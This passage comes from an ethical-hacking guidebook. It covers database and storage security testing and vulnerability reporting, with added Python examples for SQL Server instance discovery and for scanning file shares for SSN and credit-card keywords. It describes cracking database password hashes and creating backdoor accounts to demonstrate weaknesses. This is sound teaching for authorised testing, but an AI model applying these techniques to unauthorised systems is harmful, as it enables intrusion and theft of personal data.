WSFuzzer (www.owasp.org/index.php/Category:OWASP_WSFuzzer_Project) for analyzing web services.
Technologies such as Ajax and web services are here to stay, so try to get your arms around their security issues now before the technology grows even more complex.
Performing general security scans for web application vulnerabilities
I want to reiterate that both automated and manual testing need to be performed against your web systems. You're not going to see the whole picture by relying on just one of these methods. I highly recommend using an all-in-one web application vulnerability scanner such as Acunetix Web Vulnerability Scanner or AppSpider to help you root out web vulnerabilities that would be unreasonable if not impossible to find otherwise. Combine the scanner results with a malicious mindset and the hacking techniques I describe in this chapter, and you're on your way to finding the web security flaws that matter.
Minimizing Web Security Risks
Keeping your web applications secure requires ongoing vigilance in your ethical hacking efforts and on the part of your web developers and vendors. Keep up with the latest hacks, testing tools, and techniques and let your developers and vendors know that security needs to be a top priority for your organization. I discuss getting security buy-in in Chapter 20.
You can gain direct hands-on experience testing and hacking web applications by using the following resources:
OWASP WebGoat Project (www.owasp.org/index.php/Category:OWASP_WebGoat_Project)
Foundstone's SASS Hacme Tools (www.mcafee.com/us/downloads/free-tools/index.aspx)
I highly recommend you check them out and get your hands dirty!
Practicing security by obscurity
The following forms of security by obscurity (hiding something from obvious view using trivial methods) can help prevent automated attacks from worms or scripts that are hard-coded to attack specific script types or default HTTP ports:
To protect web applications and related databases, use different machines to run each web server, application, and database server.
The operating systems on these individual machines should be tested for security vulnerabilities and hardened based on best practices and the countermeasures described in Chapters 12 and 13.
Use built-in web server security features to handle access controls and process isolation, such as the application-isolation feature in IIS. This practice helps ensure that if one web application is attacked, it won't necessarily put any other applications running on the same server at risk.
Use a tool for obscuring your web server's identity, essentially anonymizing your server. An example is Port 80 Software's ServerMask (www.port80software.com/products/servermask). If you're running a Linux web server, use a program such as IP Personality (http://ippersonality.sourceforge.net) to change the OS fingerprint so the system looks like it's running something else.
Change your web application to run on a nonstandard port. Change from the default HTTP port 80 or HTTPS port 443 to a high port number, such as 8877, and, if possible, set the server to run as an unprivileged user, that is, something other than system, administrator, root, and so on. (Running as an unprivileged user is least privilege rather than obscurity, but it belongs on this list: it limits what an attacker can do after compromising the server process.)
Never ever rely on obscurity alone; it isn't foolproof. A dedicated attacker might determine that the system isn't what it claims to be, and a port scanner with service detection will identify a web server listening on 8877 in seconds. Still, even with the naysayers, it can be better than nothing.
Putting up firewalls
Consider using additional controls to protect your web systems, including the following:
A network-based firewall or IPS that can detect and block attacks against web applications. This includes commercial firewalls from such companies as WatchGuard (www.watchguard.com) and Palo Alto Networks (www.paloaltonetworks.com).
A host-based web application IPS, such as SecureIIS (www.eeye.com/products/secureiis-web-server-security) or ServerDefender (www.port80software.com/products/serverdefender), or a Web Application Firewall (WAF) from vendors such as Barracuda Networks (www.barracuda.com/products/webapplicationfirewall) and Fortinet (www.fortinet.com/products/fortiweb/index.html).
These programs can detect web application and certain database attacks in real time and cut them off before they have a chance to do any harm.
Analyzing source code
Software development is where many software security holes begin and should end but rarely do. If you feel confident in your security testing efforts to this point, you can dig deeper to find security flaws in your source code, things that might never be discovered by traditional scanners and hacking techniques but that are problems nonetheless. Fear not! It's actually much simpler than it sounds. No, you won't have to go through the code line by line to see what's happening. You don't even need development experience (although it does help).
To do this, you can use a static source code analysis tool, such as those offered by Klocwork (www.klocwork.com) and Checkmarx (www.checkmarx.com). Checkmarx's CxSuite is a standalone tool that's reasonably priced and very comprehensive in its testing of both web applications and mobile apps, something that's hard to find among source code analysis vendors.
As shown in Figure 15-11, with CxSuite, you simply load the Enterprise Client, log in to the application (default credentials are admin@cx/admin, which you should change on first use), run the Create Scan Wizard to point it to the source code and select your scan policy, click Next, click Run, and you're off and running.
Figure 15-11: Using CxSuite to do an analysis of an open source Android mobile app.
When the scan completes, you can review the findings and recommended solutions, as shown in Figure 15-12.
Figure 15-12: Reviewing the results of an open source Android e-mail app.
As you can see, what was seemingly a safe and secure e-mail app doesn't appear to be all that. You never know until you check the source code!
CxDeveloper is pretty much all you need to analyze and report on vulnerabilities in your C#, Java, and mobile source code bundled into one simple package. Checkmarx, like a few others, also offers a cloud-based source code analysis service. If you can get over any hurdles associated with uploading your source code to a third party in the cloud, these can offer a more efficient and mostly hands-free option for source code analysis.
Source code analysis will often uncover different flaws than traditional web and mobile security testing. If you want the most comprehensive level of testing, do both. The extra level of checks offered by source analysis is becoming more and more important with mobile apps. These apps are often full of security holes that many newer software developers didn't learn about in school. I cover additional mobile flaws in Chapter 11.
The bottom line with web application and mobile app security is that if you can show your developers and quality assurance analysts that security begins with them, you can really make a difference in your organization's overall information security.
Uncovering Mobile App Flaws
In addition to running a tool such as CxSuite to check for mobile app vulnerabilities, there are several other things you'll want to look for, including:
Cryptographic database keys that are hard-coded into the app
Improper handling of sensitive information, such as storing personally identifiable information (a.k.a. PII) locally where the user and other apps can access it
Login weaknesses, such as being able to get around login prompts
Allowing weak, or blank, passwords
Note that these checks are mostly uncovered via manual analysis and may require tools such as wireless network analyzers, forensics tools, and web proxies that I talk about in Chapter 9 and Chapter 11, respectively. As with IoT, the important thing is that you're testing the security of your mobile apps. Better for you to find the flaws than for someone else!
Databases and Storage Systems
In This Chapter
Testing and exploiting database flaws
Finding storage weaknesses
Ferreting out sensitive information
Countering database and storage abuse
Attacks against databases and storage systems can be very serious because that's where "the goods" are located, and those with ill intent are well aware of that. These attacks can occur across the Internet or on the internal network when external attackers and malicious insiders exploit any number of vulnerabilities. These attacks can also occur via the web application through SQL injection.
Diving Into Databases
Database systems, such as Microsoft SQL Server, MySQL, and Oracle, have lurked behind the scenes, but their value and their vulnerabilities have finally come to the forefront. Yes, even the mighty Oracle that was once claimed to be unhackable is susceptible to exploits similar to its competition. With the slew of regulatory requirements governing database security, hardly any business can hide from the risks that lie within because practically every business (large and small) uses some sort of database either in-house or hosted in the cloud.
Choosing tools
As with wireless networks, operating systems, and so on, you need good tools if you're going to find the database security issues that count. The following are my favorite tools for testing database security:
Advanced SQL Password Recovery (www.elcomsoft.com/asqlpr.html) for cracking Microsoft SQL Server passwords
Cain & Abel (www.oxid.it/cain.html) for cracking database password hashes
Nexpose (www.rapid7.com/products/nexpose) for performing in-depth vulnerability scans
SQLPing3 (www.sqlsecurity.com/downloads) for locating Microsoft SQL Servers on the network, checking for blank passwords for the 'sa' account (the default SQL Server system administrator), and performing dictionary password-cracking attacks
You can also use exploit tools, such as Metasploit, for your database testing.
Finding databases on the network
The first step in discovering database vulnerabilities is to figure out where they're located on your network. It sounds funny, but many network admins I've met aren't even aware of various databases running in their environments. This is especially true for the free SQL Server Express database software editions that anyone can download and run on your network.
I can't tell you how often I find sensitive production data, such as credit card and Social Security numbers, being used in test databases that are completely wide open to abuse by curious insiders or even external attackers that have made their way into the network. Using sensitive production data in the uncontrolled areas of the network, such as sales, software development, and quality assurance (QA), is a data breach waiting to happen.
The best tool I've found to discover Microsoft SQL Server systems is SQLPing3, which is shown in Figure 16-1.
Figure 16-1: SQLPing3 can find SQL Server systems and check for missing sa account passwords.
SQLPing3 can even discover instances of SQL Server hidden behind personal firewalls, such as Windows Firewall. This is a nice feature, as Windows Firewall is enabled by default on Windows 7 and up.
If you have Oracle in your environment, Pete Finnigan has a great list of Oracle-centric security tools at www.petefinnigan.com/tools.htm that can perform functions similar to SQLPing3.
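As an added example, not from the book, here is the protocol exchange that SQLPing3-style discovery is built on: a probe to the SQL Server Browser service on UDP 1434 (the SSRP protocol, which Microsoft documents as MC-SQLR) and a parser for its reply, which lists every instance on the host together with the TCP port it actually listens on. The discover function talks to the network; the SAMPLE_RESPONSE bytes and host names are constructed so the parser can be exercised offline.

```python
import socket

SSRP_PORT = 1434
CLNT_BCAST_EX = b"\x02"    # "list all instances", sent to the broadcast address
CLNT_UCAST_EX = b"\x03"    # same request to a single host


def parse_ssrp_response(data):
    """Parse an SVR_RESP message into one dict per SQL Server instance.

    Wire format: 0x05, a little-endian 16-bit length, then an ASCII string
    of 'Name;Value;' pairs with ';;' between instances, e.g.
    'ServerName;HOST;InstanceName;SQLEXPRESS;IsClustered;No;Version;...;tcp;1433;;'
    """
    if len(data) < 3 or data[0] != 0x05:
        raise ValueError("not an SSRP SVR_RESP message")
    length = int.from_bytes(data[1:3], "little")
    body = data[3:3 + length].decode("ascii", errors="replace")
    instances = []
    for record in body.split(";;"):
        fields = record.split(";")
        if len(fields) < 2:
            continue
        instances.append(dict(zip(fields[0::2], fields[1::2])))
    return instances


def discover(host, timeout=2.0):
    """Ask one host's SQL Browser service for its instances (network call).

    Returns [] on timeout, which is also what you get when UDP 1434 is
    filtered or the Browser service is stopped, so a silent host is not
    proof that no SQL Server is present.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    try:
        sock.sendto(CLNT_UCAST_EX, (host, SSRP_PORT))
        data, _ = sock.recvfrom(65535)
    except socket.timeout:
        return []
    finally:
        sock.close()
    return parse_ssrp_response(data)


# Constructed reply from a host running a default instance and SQL Express.
_BODY = (b"ServerName;DBSRV01;InstanceName;SQLEXPRESS;IsClustered;No;"
         b"Version;12.0.2000.8;tcp;49172;;"
         b"ServerName;DBSRV01;InstanceName;MSSQLSERVER;IsClustered;No;"
         b"Version;12.0.2000.8;tcp;1433;;")
SAMPLE_RESPONSE = b"\x05" + len(_BODY).to_bytes(2, "little") + _BODY
```

The tcp field is the part that matters for the rest of the chapter: named instances such as SQLEXPRESS sit on a dynamic port (49172 in the constructed reply), which is exactly why an admin who only checks for port 1433 does not know they are there.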
Cracking database passwords
SQLPing3 also serves as a nice dictionary-based SQL Server password-cracking program. As you saw in Figure 16-1, it checks for blank sa passwords by default. Another free tool for cracking SQL Server, MySQL, and Oracle password hashes is Cain & Abel, shown in Figure 16-2.
Figure 16-2: Using Cain & Abel to crack Oracle password hashes.
You simply load Cain & Abel, click the Cracker tab at the top, select Oracle Hashes at the bottom left, and click the blue plus symbol at the top to load a username and password hash to start the cracking. You can also select Oracle TNS Hashes at the bottom left and attempt to capture Transparent Network Substrate (TNS) authentication hashes off the wire when capturing packets with Cain. You can do the same for MySQL password hashes.
The commercial product ElcomSoft Distributed Password Recovery (www.elcomsoft.com/edpr.html) can also crack Oracle password hashes. If you have access to SQL Server master.mdf files (which are often readily available on the network due to weak share and file permissions, as I outline later in this chapter), you can use ElcomSoft's Advanced SQL Password Recovery (www.elcomsoft.com/asqlpr.html) to recover database passwords immediately.
You might stumble across some legacy Microsoft Access database files that are password protected as well. No worries: The tool Advanced Office Password Recovery (www.elcomsoft.com/acpr.html) can get you right in.
As you can imagine, these password-cracking tools are a great way to demonstrate the most basic of weaknesses in your database security. It's also a nice way to underscore the problems with critical files scattered across the network in an unprotected fashion.
Another good way to demonstrate SQL Server weaknesses is to use Microsoft SQL Server 2008 Management Studio Express (www.microsoft.com/en-us/download/details.aspx?id=7593) to connect to the database systems you now have the passwords for and set up backdoor accounts or browse around to see (and show) what's available. In practically every unprotected SQL Server system I come across, there's sensitive personal financial or healthcare information available for the taking.
Scanning databases for vulnerabilities
As with operating systems and web applications, some database-specific vulnerabilities can be rooted out only by using the right tools. I use Nexpose to find such issues as:
Buffer overflows
Privilege escalations
Password hashes accessible through default/unprotected accounts
Weak authentication methods enabled
A great all-in-one commercial database vulnerability scanner for performing in-depth database checks — including user rights audits on SQL Server, Oracle, and so on — is AppDetectivePRO (www.trustwave.com/Products/Database-Security/AppDetectivePRO). AppDetectivePRO can be a good addition to your security testing tool arsenal if you can justify the investment.
Many vulnerabilities can be tested from both an unauthenticated outsider's perspective as well as a trusted insider's perspective. The important thing is to review the security of your databases from as many angles as reasonably possible. As I've said before, if it's out there and accessible, people are going to play with it.
Following Best Practices for Minimizing Database Security Risks
Keeping your databases secure is actually pretty simple if you do the following:
Run your databases on dedicated servers (or workstations, where necessary).
Check the underlying operating systems for security vulnerabilities. I cover operating system exploits for Windows and Linux in Chapters 12 and 13, respectively.
Ensure that your databases fall within the scope of patching and system hardening.
Require strong passwords on every database system. Most enterprise-ready databases such as Oracle and SQL Server allow you to use domain authentication (such as Active Directory or LDAP) so you can just tie in your existing domain policy and user accounts and not have to worry about managing a separate set.
Use appropriate file and share permissions to keep prying eyes away.
De-identify any sensitive production data before it's used in non-production environments such as development or QA.
Check your web applications for SQL injection and related input validation vulnerabilities. (I cover web application security in Chapter 15.)
Use a network firewall, such as those available from Fortinet (www.fortinet.com) or Cisco (www.cisco.com), and database-specific controls, such as those available from Imperva (www.imperva.com) and Idera (www.idera.com).
Perform related database hardening and management using a tool such as Microsoft Security Compliance Manager (http://technet.microsoft.com/en-us/library/cc677002.aspx).
Run the latest version of database server software. The new security features in SQL Server 2012 and SQL Server 2016 are great advancements toward better database security.
Opening Up About Storage Systems
Attackers are carrying out a growing number of storage-related hacks and use various attack vectors and tools to break into the storage environment. (Surely you know what I'm going to say next.) Therefore, you need to get to know the techniques and tools yourself and use them to test your own storage environment.
There are a lot of misconceptions and myths related to the security of such storage systems as Fibre Channel and iSCSI Storage Area Networks (SANs), CIFS and NFS-based Network Attached Storage (NAS) systems, and so on. Many network and storage administrators believe that "Encryption or RAID equals storage security," "An external attacker can't reach our storage environment," "Our systems are resilient," or "Security is handled elsewhere." These are all very dangerous beliefs, and I'm confident that more attacks will target critical storage systems.
As with databases, practically every business has some sort of network storage housing sensitive information that it can't afford to lose. That's why it's important to include both network storage (SAN and NAS systems) and traditional file shares in the scope of your security testing.
Choosing tools
These are my favorite tools for testing storage security:
nmap (http://nmap.org) for port scanning to find live storage hosts
SoftPerfect Network Scanner (www.softperfect.com/products/networkscanner) for finding open and unprotected shares
FileLocator Pro (www.mythicsoft.com)
Nexpose for performing in-depth vulnerability scans
Finding storage systems on the network
To seek out storage-related vulnerabilities, you have to first figure out what's where. The best way to get rolling is to use a port scanner and, ideally, an all-in-one vulnerability scanner, such as Nexpose or LanGuard. Also, given that many storage servers have web servers built in, you can use such tools as Acunetix Web Vulnerability Scanner and Netsparker to uncover web-based flaws. You can use these vulnerability scanners to gain good insight into areas that need further inspection, such as weak authentication, unpatched operating systems, cross-site scripting, and so on.
A commonly overlooked storage vulnerability is that many storage systems can be accessed from both the de-militarized zone (DMZ) segment and the internal network segment(s). This vulnerability poses risks to both sides of the network. Be sure to manually check to see if you can reach the DMZ from the internal network and vice versa.
You can also perform basic file permission and share scans (as outlined in Chapter 12) in conjunction with a text search tool to uncover sensitive information that everyone on the network should not have access to. Digging down further, a quick means for finding open network shares is to use SoftPerfect Network Scanner's share scanning capabilities, as shown in Figure 16-3.
Figure 16-3: Using SoftPerfect Network Scanner to search for network shares.
As you can see in Figure 16-3, Network Scanner enables you to perform a security and permission scan for all devices or simply for folders. I recommend selecting Specific account in the Authentication section shown in Figure 16-3 and then clicking Manage so you can enter a domain account for the network that has general user permissions. This will provide a good level of access to determine which shares are accessible.
Once Network Scanner has completed its scan, the shares showing Everyone in the Shared Folder Security column point you to the shares that need attention. Hardly a security assessment goes by without coming across such shares open to the Windows Everyone group. Just as common is to see the directories and files within these shares that are also accessible to any logged-in Windows user to open, modify, delete — whatever they please. How's that for accountability!?
Rooting out sensitive text in network files
Once you find open network shares, you'll then want to scan for sensitive information stored in files such as PDFs, .docx, and .xlsx files. It's as simple as using a text search utility, such as FileLocator Pro or Effective File Search (www.sowsoft.com/search.htm). Alternatively, you can use Windows Explorer or the find command in Linux to scan for sensitive information, but it's just too slow and cumbersome for my liking.
You'll be amazed at what you come across stored insecurely on users' desktops, server shares, and more, such as:
Employee health records
Customer credit card numbers
Corporate financial reports
Source code
Master database files (as I mentioned earlier)
The sky's the limit. Such sensitive information should not only be protected by good business practices, but is also governed by state, federal, and international regulations, so you have to make sure that you find it and secure it.
Do your searches for sensitive text while you're logged into the local system or domain as a regular user — not as an administrator. This will give you a better view of regular users who have unauthorized access to sensitive files and shares that you thought were otherwise secure. When using a basic text search tool, such as FileLocator Pro, look for the following text strings:
DOB (for dates of birth)
SSN (for Social Security numbers)
License (for driver's license information)
Credit or CCV (for credit card numbers)
Don't forget about your mobile devices when seeking sensitive, unprotected information. Everything from laptops to USB drives to external hard drives is fair game to the bad guys. A misplaced or stolen system is all it takes to create a costly data breach.
The possibilities for information exposure are endless; just start with the basics and only peek into common files that you know might have some juicy info in them. Limiting your search to these files will save you a ton of time!
.txt
.doc and .docx
.rtf
.xls and .xlsx
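The search described above, as an added example that is not part of the book: a small Python scanner that walks a mounted share as a regular user, looks only at the file types just listed, and reports which files contain the DOB, SSN, License, Credit, or CCV strings. It reads .docx and .xlsx as the ZIP-of-XML containers they are (PDF content search, which FileLocator Pro offers, is out of scope here); the sample share it builds is constructed for illustration.

```python
"""Scan a file share for the sensitive-text markers listed in the chapter.

Added example, not from the book. Run it as an ordinary domain user against a
mounted share so the hits reflect what any logged-in user can read.
"""
import os
import re
import tempfile
import zipfile
from dataclasses import dataclass

# Common file types the chapter suggests limiting the search to.
TARGET_EXTENSIONS = {".txt", ".doc", ".docx", ".rtf", ".xls", ".xlsx"}

# Keyword strings from the chapter, matched case-insensitively as whole words.
KEYWORDS = ("DOB", "SSN", "License", "Credit", "CCV")
KEYWORD_RE = re.compile(r"\b(" + "|".join(KEYWORDS) + r")\b", re.IGNORECASE)
CANONICAL = {k.lower(): k for k in KEYWORDS}


@dataclass
class Finding:
    path: str        # path relative to the share root, "/"-separated
    keywords: tuple  # distinct keywords found, in the chapter's spelling
    sample: str      # text around the first hit, for the report


def extract_text(path: str) -> str:
    """Return searchable text for one file.

    .docx/.xlsx are ZIP containers of XML parts; joining the XML and stripping
    tags is enough to find keyword strings (cell text lives in sharedStrings.xml).
    Legacy .doc/.xls and .rtf are decoded leniently from raw bytes, which still
    exposes plain ASCII strings such as column headers.
    """
    ext = os.path.splitext(path)[1].lower()
    if ext in {".docx", ".xlsx"}:
        with zipfile.ZipFile(path) as zf:
            xml = "\n".join(zf.read(n).decode("utf-8", "ignore")
                            for n in zf.namelist() if n.endswith(".xml"))
        return re.sub(r"<[^>]+>", " ", xml)
    with open(path, "rb") as fh:
        return fh.read().decode("latin-1", "ignore")


def scan_share(root: str) -> list:
    """Walk root and return one Finding per file containing a keyword."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in TARGET_EXTENSIONS:
                continue
            path = os.path.join(dirpath, name)
            try:
                text = extract_text(path)
            except (OSError, zipfile.BadZipFile):
                continue  # unreadable or malformed file: skip, don't abort the scan
            hits = KEYWORD_RE.findall(text)
            if not hits:
                continue
            first = KEYWORD_RE.search(text)
            snippet = text[max(0, first.start() - 30):first.end() + 30]
            findings.append(Finding(
                os.path.relpath(path, root).replace(os.sep, "/"),
                tuple(sorted({CANONICAL[h.lower()] for h in hits})),
                " ".join(snippet.split()),
            ))
    return sorted(findings, key=lambda f: f.path)


def build_sample_share(root: str) -> None:
    """Create constructed sample files (no real data) to exercise the scanner."""
    os.makedirs(os.path.join(root, "HR"))
    os.makedirs(os.path.join(root, "Public"))
    with open(os.path.join(root, "HR", "new_hires.txt"), "w", encoding="utf-8") as fh:
        fh.write("Name, DOB, SSN\nJane Doe, 1990-01-01, 000-00-0000\n")
    with open(os.path.join(root, "Public", "lunch_menu.txt"), "w", encoding="utf-8") as fh:
        fh.write("Monday: pizza\nTuesday: tacos\n")
    # A minimal .docx: a ZIP holding the main document XML part.
    with zipfile.ZipFile(os.path.join(root, "HR", "benefits.docx"), "w") as zf:
        zf.writestr("word/document.xml",
                    "<w:document><w:t>Enter your credit card number and CCV.</w:t></w:document>")
    # Skipped because of its extension, even though the bytes contain a keyword.
    with open(os.path.join(root, "Public", "logo.png"), "wb") as fh:
        fh.write(b"SSN inside a binary we do not scan")


def demo() -> list:
    """Build the constructed share in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_share(tmp)
        return scan_share(tmp)


if __name__ == "__main__":
    for f in demo():
        print(f"{f.path}: {', '.join(f.keywords)}  ...{f.sample}...")
```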
An example of a basic text search using FileLocator Pro is shown in Figure 16-4. Note the files found in different locations on the server.
Figure 16-4: Using FileLocator Pro to search for sensitive text on unprotected shares.
FileLocator Pro also has the ability to search for content inside PDF files to uncover sensitive data.
To speed the process, you can use Sensitive Data Manager, a really neat tool designed for the very purpose of scanning storage devices for sensitive, personally identifiable information. It can also search inside binary files such as PDFs.
For a second round of testing, you could perform your searches logged in as an administrator. You're likely to find a lot of sensitive information scattered about. It might seem worthless at first; however, this can highlight sensitive information stored in places it shouldn't be or that network administrators shouldn't have access to.
Testing is highly dependent on timing, searching for the right keywords, and looking at the right systems on the network. You likely won't root out every single bit of sensitive information, but this effort will show you where certain problems are, which will help you to justify the need for stronger access controls and better IT and security management processes.
Following Best Practices for Minimizing Storage Security Risks
Like database security, storage security is not brain surgery. Keeping your storage systems secure is also simple if you do the following:
Check the underlying operating systems for security vulnerabilities. I cover operating system exploits for Windows and Linux in Chapters 12 and 13.
Ensure that your network storage (SAN and NAS systems) falls within the scope of patching and system hardening.
Require strong passwords on every storage management interface.
Use appropriate file and share permissions to keep prying eyes away.
Educate your users on where to store sensitive information and the risks of mishandling it.
De-identify any sensitive production data before it's used in development or QA. There are tools made for this specific purpose.
Use a network firewall, such as those available from Fortinet (www.fortinet.com) or WatchGuard Technologies (www.watchguard.com), to ensure only the people and systems that need to access your storage environment can do so and nothing more.
Five Pieces of Information Every Security Report Must Have
Date(s) the testing was performed
Tests that were performed
Summary of the vulnerabilities discovered
Prioritized list of vulnerabilities that need to be addressed
Recommendations and specific steps on how to plug the security holes found
Learn how to keep up your security testing momentum at www.dummies.com/extras/hacking.
In this part…
Now that the hard — or at least technical — stuff is over with, it's time to pull everything together, fix what's broken, and establish good information security practices to help you move forward.
First, this part covers reporting the security vulnerabilities you discover to help get management buy-in and hopefully more money in your budget to make things right. This part then covers good practices for plugging the security holes within your systems. Finally, this part covers what it takes to manage change within your information systems for long-term success, including outsourcing ethical hacking to help ease the burden of your massive to-do list! That's what working in information security is all about anyway, right?
Reporting Your Results
In This Chapter
Bringing your test data together
Categorizing vulnerabilities you discover
Documenting and presenting the results
If you're wishing for a break after testing, now isn't the time to rest on your laurels. The reporting phase of your security assessment is one of the most critical pieces. The last thing you want to do is to run your tests, find security problems, and leave it at that. Put your time and effort to good use by thoroughly analyzing and documenting what you find to ensure that security vulnerabilities are eliminated and your information is more secure as a result. Reporting is an essential element of the ongoing vigilance that information security and risk management requires.
Reporting includes sifting through all your findings to determine which vulnerabilities need to be addressed and which ones don't really matter. Reporting also includes briefing management or your client on the various security issues you find, as well as giving specific recommendations for making improvements. You share the information you've gathered and give the other parties guidance on where to go from there. Reporting also shows that the time, effort, and money invested in the security tests were put to good use.
Pulling the Results Together
When you have gobs of test data — from screenshots and manual observations you documented to detailed reports generated by the various vulnerability scanners you used — what do you do with it all? You need to go through your documentation with a fine-toothed comb and highlight all the areas that stand out. Base your decisions on the following:
Vulnerability rankings from your assessment tools
Your knowledge as an IT/security professional
The context of the vulnerability and how it actually impacts the business
So that you can find out more information about the vulnerability, many feature-rich security tools assign each vulnerability a ranking (based on overall risk), explain the vulnerability, give possible solutions, and include relevant links to the following: vendor sites, the Common Vulnerabilities and Exposures website at http://cve.mitre.org, and the National Vulnerability Database at https://nvd.nist.gov. For further research, you might also need to reference your vendor's site, other support sites, and online forums to see whether the vulnerability affects your particular system and situation. Overall business risk is your main focus.
In your final report document, you might want to organize the vulnerabilities as shown in the following list:
Nontechnical findings
Social engineering vulnerabilities
Physical security vulnerabilities
IT and security operations vulnerabilities
Technical findings
Network infrastructure
Operating systems
Firewall rulebases
Databases
Web applications
Mobile apps
Mobile devices
For further clarity, you can create separate sections in your report for internal and external security vulnerabilities as well as high and moderate priority. One final note: it's generally a good idea to vet your findings with system owners first to ensure that they're actually valid.
Prioritizing Vulnerabilities
Prioritizing the security vulnerabilities you find is critical because many issues might not be fixable, and others might not be worth fixing. You might not be able to eliminate some vulnerabilities because of various technical reasons, and you might not be able to afford to eliminate others. Or, simply enough, your business may have a certain level of risk tolerance. Every situation is different. You need to factor whether the benefit is worth the effort and cost. On the other hand, spending a few weeks' worth of development time to fix cross-site scripting and SQL injection vulnerabilities could be worth a lot of money, especially if you end up getting dinged by third parties or lose potential customers. The same goes for mobile devices that everyone swears contain no sensitive information. You need to study each vulnerability carefully, determine the business risk, and weigh whether the issue is worth fixing.
It's impossible — or at least not worth trying — to fix every vulnerability that you find. Analyze each vulnerability carefully and determine your worst-case scenarios. So you have cross-site request forgery (CSRF) on your printer's web interface? What's the business risk? Perhaps FTP is running on numerous internal servers. What's the business risk? For many security flaws, you'll likely find the risk is just not there.
I've found that with security — like most areas of life — you have to focus on your highest payoff tasks. Otherwise, you'll drive yourself nuts and probably won't get very far in meeting your own goals. Here's a quick method to use when prioritizing your vulnerabilities. You can tweak this method to accommodate your needs. You need to consider two major factors for each of the vulnerabilities you discover:
Likelihood of exploitation: How likely is it that the specific vulnerability you're analyzing will be taken advantage of by a hacker, a malicious user, malware, or some other threat?
Impact if exploited: How detrimental would it be if the vulnerability you're analyzing were exploited?
Many people often skip these considerations and assume that every vulnerability discovered has to be resolved. Big mistake. Just because a vulnerability is discovered doesn't mean it applies to your particular situation and environment. If you go in with the mindset that every vulnerability will be addressed regardless of circumstances, you'll waste a lot of unnecessary time, effort, and money, and you can set up your security assessment program for failure in the long term. However, be careful not to swing too far in the other direction! Many vulnerabilities don't appear too serious on the surface but could very well get your organization into hot water if they're exploited. Dig in deep and use some common sense.
Rank each vulnerability, using criteria such as High, Medium, and Low or a 1-through-5 rating (where 1 is the lowest priority and 5 is the highest) for each of the two considerations. Table 17-1 shows a sample table and a representative vulnerability for each category.
Table 17-1 Prioritizing Vulnerabilities
High Impact
  High Likelihood: Sensitive information stored on an unencrypted laptop
  Medium Likelihood: Tape backups taken offsite that are not encrypted and/or password protected
  Low Likelihood: No administrator password on an internal SQL Server system
Medium Impact
  High Likelihood: Unencrypted e-mails containing sensitive information being sent
  Medium Likelihood: Missing Windows patch on an internal server that can be exploited using Metasploit
  Low Likelihood: No passwords required on several Windows administrator accounts
Low Impact
  High Likelihood: Outdated virus signatures on a standalone PC dedicated to Internet browsing
  Medium Likelihood: Employees or visitors gaining unauthorized network access
  Low Likelihood: Weak encryption ciphers being used on a marketing website
The vulnerability prioritization shown in Table 17-1 is based on the qualitative method of assessing security risks. In other words, it's subjective, based on your knowledge of the systems and vulnerabilities. You can also consider any risk ratings you get from your security tools — just don't rely solely on them, because a vendor can't provide ultimate rankings of vulnerabilities.
Creating Reports
You may need to organize your vulnerability information into a formal document for management or for your client. This is not always the case, but it's often the professional thing to do and shows that you take your work seriously. Ferret out the critical findings and document them so that other parties can understand them.
Graphs and charts are a plus. Screen captures of your findings — especially when it's difficult to save the data to a file — add a nice touch to your reports and show tangible evidence that the problem exists.
Document the vulnerabilities in a concise, nontechnical manner. Every report should contain the following information:
Date(s) the testing was performed
Tests that were performed
Summary of the vulnerabilities discovered
Prioritized list of vulnerabilities that need to be addressed
Recommendations and specific steps on how to plug the security holes found
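The prioritization method from the previous section and the five required report elements above, carried through in code as an added example that is not part of the book: each finding gets a 1-to-5 likelihood and impact rating, the ratings map onto the High/Medium/Low bands of Table 17-1, the list is ordered so findings that are both high impact and high likelihood come first, and the result is laid out in the five sections every report must have. The sample findings are the ones named in Table 17-1; their numeric ratings are constructed to match the table's bands.

```python
"""Rank findings by likelihood and impact and emit the five report sections.

Added example, not from the book. Ratings on the sample findings are
constructed for illustration.
"""
from collections import Counter
from dataclasses import dataclass


@dataclass
class Finding:
    title: str
    likelihood: int  # 1 (least likely to be exploited) .. 5 (most likely)
    impact: int      # 1 (least damaging if exploited) .. 5 (most damaging)
    recommendation: str


def band(rating: int) -> str:
    """Map a 1-to-5 rating onto the High/Medium/Low bands used in Table 17-1."""
    if not 1 <= rating <= 5:
        raise ValueError(f"rating must be 1..5, got {rating}")
    return {5: "High", 4: "High", 3: "Medium"}.get(rating, "Low")


def must_fix_now(f: Finding) -> bool:
    """Both important (high impact) and urgent (high likelihood)."""
    return band(f.impact) == "High" and band(f.likelihood) == "High"


def prioritize(findings):
    """Highest payoff first.

    Sorting on the weaker of the two ratings first keeps a finding that is only
    high impact or only high likelihood below one that is moderate on both.
    """
    key = lambda f: (min(f.impact, f.likelihood), f.impact + f.likelihood, f.impact)
    return sorted(findings, key=key, reverse=True)


def build_report(findings, test_dates, tests_performed) -> str:
    ranked = prioritize(findings)
    impact_counts = Counter(band(f.impact) for f in findings)
    lines = ["Security assessment report",
             f"1. Date(s) the testing was performed: {', '.join(test_dates)}",
             "2. Tests that were performed:"]
    lines += [f"   - {t}" for t in tests_performed]
    lines.append("3. Summary of the vulnerabilities discovered: "
                 f"{len(findings)} findings ({impact_counts['High']} high, "
                 f"{impact_counts['Medium']} medium, {impact_counts['Low']} low impact)")
    lines.append("4. Prioritized list of vulnerabilities that need to be addressed:")
    for i, f in enumerate(ranked, 1):
        flag = "  <-- fix first" if must_fix_now(f) else ""
        lines.append(f"   {i}. [{band(f.impact)} impact / {band(f.likelihood)} likelihood] "
                     f"{f.title}{flag}")
    lines.append("5. Recommendations and specific steps:")
    lines += [f"   - {f.title}: {f.recommendation}" for f in ranked]
    return "\n".join(lines)


# Sample findings from Table 17-1; ratings constructed to match its bands.
SAMPLE_FINDINGS = [
    Finding("Sensitive information stored on an unencrypted laptop", 5, 5,
            "Enable full-disk encryption on all laptops via policy"),
    Finding("Tape backups taken offsite that are not encrypted or password protected", 3, 5,
            "Encrypt backup media and track custody"),
    Finding("No administrator password on an internal SQL Server system", 2, 5,
            "Set a strong sa password and move to domain authentication"),
    Finding("Missing Windows patch on an internal server that can be exploited using Metasploit", 3, 3,
            "Apply the patch through the normal change window"),
    Finding("Outdated virus signatures on a standalone PC dedicated to Internet browsing", 5, 1,
            "Point the PC at the central update server"),
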